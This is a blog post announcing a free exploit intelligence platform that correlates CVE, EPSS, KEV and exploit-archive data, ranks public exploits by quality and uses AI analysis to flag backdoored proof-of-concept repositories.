Let’s be honest about the state of public exploit intelligence: it’s a mess.
The Problem Nobody Talks About
Every security professional has lived this. A critical CVE drops. You need to know: is there a public exploit? Does it actually work? Is it relevant to my environment? Simple questions. You’d think the answers would be easy to find.
They’re not.
The NVD gives you metadata - CVSS scores, CWE classifications, affected product lists. Useful, but it won’t tell you if someone’s already weaponized the vulnerability. For that, you need exploit databases. And this is where things get uncomfortable.
The public exploit archives have a quality problem. Browse through them and you’ll find proof-of-concepts that were never tested, scripts that target the wrong version, code that doesn’t compile, and - this is the part that really gets us - exploits that are straight-up backdoored. Repositories with hundreds of GitHub stars that contain obfuscated reverse shells buried in “helper” functions. People download these things and run them on their assessment machines. Researchers, pentesters, defenders trying to validate whether they’re vulnerable - and the tool they’re using to check is itself malicious.
Nobody talks about this enough. The community treats exploit archives like trusted infrastructure, but the reality is that most public exploit code has never been verified by anyone. There’s no peer review. No quality gate. You’re on your own.
Meanwhile, the data you actually need is scattered across a dozen sources that don’t talk to each other. NVD has the CVE. EPSS has the exploitation probability. CISA KEV has the confirmed-in-the-wild list. Metasploit has peer-reviewed modules. ExploitDB has a massive archive. GitHub has thousands of PoCs. None of them give you the complete picture. You want to answer “should I care about this CVE?” and you need six browser tabs and twenty minutes.
We got tired of the tab-switching. So we built EIP.
What EIP Actually Does
The Exploit Intelligence Platform pulls from 16 sources, correlates everything by CVE, and gives you the full picture in one place. The usual suspects are all here - NVD for metadata, CISA KEV for confirmed in-the-wild exploitation, EPSS for 30-day exploitation probability, ExploitDB for the archive (warts and all), Metasploit for the gold standard in peer-reviewed modules, and GitHub for the wild west of PoC repositories. But also VulnCheck KEV with ransomware attribution, InTheWild.io for crowd-sourced exploitation signals, ENISA’s EU database, OSV.dev for kernel version ranges, Nuclei for scanner templates, and GHSA for package ecosystem advisories.
Sixteen sources, each on its own ingestion schedule. The pipeline normalizes the data, deduplicates it, correlates everything to CVE IDs, and - this is the part we care about most - ranks exploits by quality.
Not all exploits are created equal. A Metasploit module has been peer-reviewed, tested across environments, and maintained by the community. A random GitHub repo with a poc.py that appeared twelve hours after the CVE dropped? That could be a working exploit, a broken sketch, or a credential stealer wearing a trenchcoat. EIP makes this hierarchy explicit: Metasploit first, then verified ExploitDB entries, then GitHub PoCs ranked by stars and community signals, with flagged trojans at the bottom where they belong.
The AI Layer
Ranking by source gets you partway there. But the quality problem runs deeper than provenance.
We run every exploit through AI analysis that classifies it across multiple dimensions - what kind of attack it is (RCE, SQLi, XSS, privilege escalation), how complex the exploit is, how reliable it is, what software it targets, and what MITRE ATT&CK techniques it maps to. More importantly, the analysis flags deception indicators: obfuscated payloads, hidden callbacks, credential exfiltration disguised as “connectivity checks.”
Out of 73K+ exploits analyzed so far, we’ve caught hundreds of trojans. These aren’t edge cases - they’re repos that show up in search results when people look for PoCs for real vulnerabilities. Some have significant star counts. The trojan detection post goes deeper into this, but the short version is: if you’re pulling exploit code from public sources and running it without review, you should probably stop doing that.
The Numbers
As of today: 354K+ CVEs. 115K+ exploits correlated to 52K+ vulnerabilities. 4,600+ CVEs confirmed exploited in the wild. 565 with confirmed ransomware use. Nearly 4,000 Nuclei templates. 37K+ vendors and 41K+ exploit authors tracked.
Those numbers change daily. EPSS scores refresh every 24 hours. New CVEs from NVD arrive within hours of publication. Exploit sources are crawled on regular intervals. When you query EIP for a CVE, you get the current state of knowledge - not last week’s snapshot and definitely not last quarter’s spreadsheet.
Why It’s Free
This is a non-commercial project. There’s no paid tier, no enterprise upsell, no “contact sales for the full data.” The API has rate limits to keep things fair, but the data is open.
We built this because we needed it. The tools that existed didn’t give us what we wanted - and the ones that came close were either paywalled, poorly maintained, or hadn’t been updated since the Obama administration. The security community deserves an exploit intelligence source that’s fast, trustworthy, and doesn’t treat basic vulnerability context as a premium feature.
Old-school spirit, modern infrastructure. Built for responsible research and authorized testing. That’s it.
What’s Next
The AI analysis pipeline keeps expanding. More exploit sources are being integrated. The MCP server already lets AI assistants query the full platform directly - which led to some unexpected results we’ll be writing about soon.
This blog is where we’ll share what we learn along the way. If you’ve been frustrated by the same problems we were - the tab-switching, the unverified PoCs, the constant question of “but does this actually work?” - give the platform a look . If you find something broken, tell us. If you build something interesting on top of it, we’d love to hear about it.